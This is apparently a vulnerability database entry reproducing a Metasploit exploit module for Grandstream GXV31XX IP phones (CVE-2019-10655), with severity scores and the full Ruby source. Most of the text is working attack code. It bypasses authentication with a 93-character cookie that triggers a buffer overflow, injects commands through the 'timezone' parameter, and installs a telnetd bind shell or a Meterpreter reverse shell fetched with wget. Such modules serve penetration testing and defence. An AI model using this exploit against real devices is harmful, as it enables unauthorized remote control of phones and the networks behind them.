Lucene search

Alhazred, Brendan Scarvell, bcoles <[email protected]>MSF:EXPLOIT-LINUX-HTTP-GRANDSTREAM_GXV31XX_SETTIMEZONE_UNAUTH_CMD_EXEC-

HistoryJan 29, 2022 - 7:24 p.m.

Grandstream GXV31XX 'settimezone' Unauthenticated Command Execution

2022-01-2919:24:09

alhazred, Brendan Scarvell, bcoles <[email protected]>

www.rapid7.com

grandstream

gxv31xx

settimezone

unauthenticated

command execution

vulnerability

buffer overflow

cookie parsing

bypassed authentication

firmware

hardware.

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS

0.917

Percentile

99.0%

JSON

This module exploits a command injection vulnerability in Grandstream GXV31XX IP multimedia phones. The ‘settimezone’ action does not validate input in the ‘timezone’ parameter allowing injection of arbitrary commands. A buffer overflow in the ‘phonecookie’ cookie parsing allows authentication to be bypassed by providing an alphanumeric cookie 93 characters in length. This module was tested successfully on Grandstream models: GXV3175v2 hardware revision V2.6A with firmware version 1.0.1.19; and GXV3140 hardware revision V0.4B with firmware version 1.0.1.27.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Deprecated

  moved_from 'exploit/linux/http/grandstream_gxv3175_settimezone_unauth_cmd_exec'

  HttpFingerprint = { pattern: [ /Multimedia Phone/ ] }.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Grandstream GXV31XX 'settimezone' Unauthenticated Command Execution",
        'Description' => %q{
          This module exploits a command injection vulnerability in Grandstream GXV31XX
          IP multimedia phones. The 'settimezone' action does not validate input in the
          'timezone' parameter allowing injection of arbitrary commands.

          A buffer overflow in the 'phonecookie' cookie parsing allows authentication
          to be bypassed by providing an alphanumeric cookie 93 characters in length.

          This module was tested successfully on Grandstream models:
          GXV3175v2 hardware revision V2.6A with firmware version 1.0.1.19; and
          GXV3140 hardware revision V0.4B with firmware version 1.0.1.27.
        },
        'Author' => [
          'alhazred', # Command injection vulnerability discovery and exploit
          'Brendan Scarvell', # Auth bypass discovery
          'bcoles' # Metasploit
        ],
        'License' => MSF_LICENSE,
        'Platform' => %w[unix linux],
        'References' => [
          [ 'CVE', '2019-10655' ],
          [ 'URL', 'https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=23920' ],
          [ 'URL', 'https://github.com/dirtyfilthy/gxv3175-remote-code-exec/blob/master/modules/exploits/linux/http/grandstream_gxv3175_cmd_exec.rb' ]
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        },
        'DisclosureDate' => '2016-09-01',
        'Privileged' => true,
        'CmdStagerFlavor' => %w[wget],
        'Targets' => [
          [
            'Linux (cmd)', {
              'Arch' => ARCH_CMD,
              'Platform' => 'unix',
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/bind_busybox_telnetd'
              }
            }
          ],
          [
            'Linux (ARMLE)', {
              'Arch' => ARCH_ARMLE,
              'Platform' => 'linux',
              'DefaultOptions' => {
                'PrependFork' => true,
                'MeterpreterTryToFork' => true,
                'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp',
                'CMDSTAGER::FLAVOR' => 'wget'
              }
            }
          ],
        ],
        'DefaultTarget' => 0
      )
    )
  end

  def send_manager_request(vars_get)
    send_request_cgi(
      'uri' => '/manager',
      'cookie' => "phonecookie=\"#{rand_text_alpha(93)}\"",
      'vars_get' => vars_get
    )
  end

  def check
    res = send_manager_request(
      'action' => 'settimezone',
      'timezone' => ''
    )

    if res && res.code == 200 && res.body.to_s.include?('Response=Success')
      return CheckCode::Detected('phonecookie authentication bypassed successfully.')
    end

    CheckCode::Safe
  end

  def execute_command(cmd, _opts = {})
    res = send_manager_request(
      'action' => 'settimezone',
      'timezone' => "`#{cmd}`"
    )
    unless res
      fail_with(Failure::Unreachable, 'Connection failed')
    end
    unless res.code == 200
      fail_with(Failure::UnexpectedReply, "Unexpected reply (HTTP #{res.code})")
    end
    unless res.body.to_s.include?('Response=Success')
      fail_with(Failure::UnexpectedReply, "Unexpected reply (#{res.body.length} bytes)")
    end
  end

  def exploit
    if target.arch.first == ARCH_CMD
      execute_command(payload.encoded)
    else
      execute_cmdstager(
        linemax: 220, # 255 minus URL encoding
        background: true
      )
    end
  end
end